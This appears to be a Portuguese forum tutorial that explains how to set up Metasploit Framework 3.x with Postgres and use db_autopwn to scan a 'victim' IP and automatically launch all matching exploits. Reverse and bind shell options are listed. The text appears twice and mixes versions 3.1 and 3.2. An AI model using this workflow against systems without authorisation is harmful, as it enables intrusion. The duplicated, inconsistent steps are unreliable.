Tweet
METASPLOIT FRAMEWORK – Auto Exploração!!
O que é o Metasploit Framework.
Metasploit Framework é uma plataforma de desenvolvimento que lhe auxiliará na criação de ferramentas de segurança e exploits. O utilitário pode ser usado por profissionais de segurança de redes para testar possíveis ataques.
Com ferramentas avançadas, qualquer usuário pode testar a vulnerabilidade de suas plataformas, sistemas operacionais e servidores. Afinal de contas, aquele velho ditado tambem pode ser aplicado na informática: com segurança não se brinca!
O metasploit é de interface GUI, como tambem console. Eu prefiro console, mas voce pode utilizar a que melhor te agrade.
O metasploit esta na versão 3.1 e pode ser baixado de seu site.
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Instalando o Metasploit
Faça o download do Metasploit. Link direto:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Feito o download, vamos descompactar e utilizar. Entre no console, vá ao diretorio que foi salvo o metasploit e faça:
$ tar -xzvf framework-3.2.tar.gz
Entre no diretorio
$ cd framework-3.1
E execute o programa, no caso o console.
$ ./msfconsole
Auto Exploração
A auto exploração do metasploit consiste em, o programa faz um scan na vitima e com base em portas abertas, seleciona os exploits e testa exploit por exploit. Sendo assim, depois de configurado o metasploit faria o papel de uma invasão com apenas uma linha de comando. Lembro que o objetivo deste tutorial é somente a estudos, e que se limitar somente a programas assim como o metasploit, não trás conhecimentos.
Mãos a obra!
Com o Metasploit instalado, instalando Postgres
# yum install postgres
Após a instalação do postgres é nescessario ruby. Instale o ruby e rubygems
# yum install ruby rubygems
Com tudo certo, vamos agora instalar Active Record e Postgresql.
# gem install activerecord
# gem install postgresql.
Criando as tabelas nescessárias para a auto exploração.
Se caso você se perguntou o por que de utilizar o postgres. Esta aqui a resposta, as informações do servidor, portas abertas e exploits utilizados são armazenadas em um banco de dados do postgres. Certificando que o serviço Postgres esta rodando em seu sistema, vamos criar as tabelas
# su – postgres
$ psql -d template1 -U postgres
Estamos dentro do console do postgres, aqui iremos criar nossas tabelas.
Welcome to psql 7.4.16, the PostgreSQL interactive terminal.
Type: \\copyright for distribution terms
\\h for help with SQL commands
\\? for help on internal slash commands
\\g or terminate with semicolon to execute query
\\q to quit
template1=#
template1=# CREATE USER root WITH PASSWORD ‘minha senha’;
template1=# CREATE DATABASE metasploit3;
template1=# GRANT ALL PRIVILEGES ON DATABASE metasploit3 to root;
template1=# \q
Criada nossa tabela, está tudo pronto para iniciar nossa auto exploração. Inicie o metasploit.
# cd framework-3.2
# ./msfconsole
Dentro do console Metasploit, digite os comandos
. load db_postgres
. db_create (obs: em casos alguns erros são apresentados, ignore.)
. db_hosts
. db_nmap “ip da vitima”
Após o programa fazer o scan, se tudo deu certinho. Esta feito, após o scan, execute o comando
db_autpwn -p -t –e
O Metasploit ira executar exploit por exploit.
Bom, meu primeiro tutorial, espero que gostem.
Criticas serão bem vindas para sempre procurar melhorar.
Ahh não podia me esquecer. Aqui vai os argumentos para o comando db_autopwn
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-s Only obtain a single shell per target system (NON-FUNCTIONAL)
-r Use a reverse connect shell
-b Use a bind shell on a random port
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
Abraço a todos!
Créditos: Haxtofu.
Metasploit Framework é uma plataforma de desenvolvimento que lhe auxiliará na criação de ferramentas de segurança e exploits. O utilitário pode ser usado por profissionais de segurança de redes para testar possíveis ataques.
Com ferramentas avançadas, qualquer usuário pode testar a vulnerabilidade de suas plataformas, sistemas operacionais e servidores. Afinal de contas, aquele velho ditado tambem pode ser aplicado na informática: com segurança não se brinca!
O metasploit é de interface GUI, como tambem console. Eu prefiro console, mas voce pode utilizar a que melhor te agrade.
O metasploit esta na versão 3.1 e pode ser baixado de seu site.
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Instalando o Metasploit
Faça o download do Metasploit. Link direto:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Feito o download, vamos descompactar e utilizar. Entre no console, vá ao diretorio que foi salvo o metasploit e faça:
$ tar -xzvf framework-3.2.tar.gz
Entre no diretorio
$ cd framework-3.1
E execute o programa, no caso o console.
$ ./msfconsole
Auto Exploração
A auto exploração do metasploit consiste em, o programa faz um scan na vitima e com base em portas abertas, seleciona os exploits e testa exploit por exploit. Sendo assim, depois de configurado o metasploit faria o papel de uma invasão com apenas uma linha de comando. Lembro que o objetivo deste tutorial é somente a estudos, e que se limitar somente a programas assim como o metasploit, não trás conhecimentos.
Mãos a obra!
Com o Metasploit instalado, instalando Postgres
# yum install postgres
Após a instalação do postgres é nescessario ruby. Instale o ruby e rubygems
# yum install ruby rubygems
Com tudo certo, vamos agora instalar Active Record e Postgresql.
# gem install activerecord
# gem install postgresql.
Criando as tabelas nescessárias para a auto exploração.
Se caso você se perguntou o por que de utilizar o postgres. Esta aqui a resposta, as informações do servidor, portas abertas e exploits utilizados são armazenadas em um banco de dados do postgres. Certificando que o serviço Postgres esta rodando em seu sistema, vamos criar as tabelas
# su – postgres
$ psql -d template1 -U postgres
Estamos dentro do console do postgres, aqui iremos criar nossas tabelas.
Welcome to psql 7.4.16, the PostgreSQL interactive terminal.
Type: \\copyright for distribution terms
\\h for help with SQL commands
\\? for help on internal slash commands
\\g or terminate with semicolon to execute query
\\q to quit
template1=#
template1=# CREATE USER root WITH PASSWORD ‘minha senha’;
template1=# CREATE DATABASE metasploit3;
template1=# GRANT ALL PRIVILEGES ON DATABASE metasploit3 to root;
template1=# \q
Criada nossa tabela, está tudo pronto para iniciar nossa auto exploração. Inicie o metasploit.
# cd framework-3.2
# ./msfconsole
Dentro do console Metasploit, digite os comandos
. load db_postgres
. db_create (obs: em casos alguns erros são apresentados, ignore.)
. db_hosts
. db_nmap “ip da vitima”
Após o programa fazer o scan, se tudo deu certinho. Esta feito, após o scan, execute o comando
db_autpwn -p -t –e
O Metasploit ira executar exploit por exploit.
Bom, meu primeiro tutorial, espero que gostem.
Criticas serão bem vindas para sempre procurar melhorar.
Ahh não podia me esquecer. Aqui vai os argumentos para o comando db_autopwn
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-s Only obtain a single shell per target system (NON-FUNCTIONAL)
-r Use a reverse connect shell
-b Use a bind shell on a random port
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
Abraço a todos!
Créditos: Haxtofu.
Comment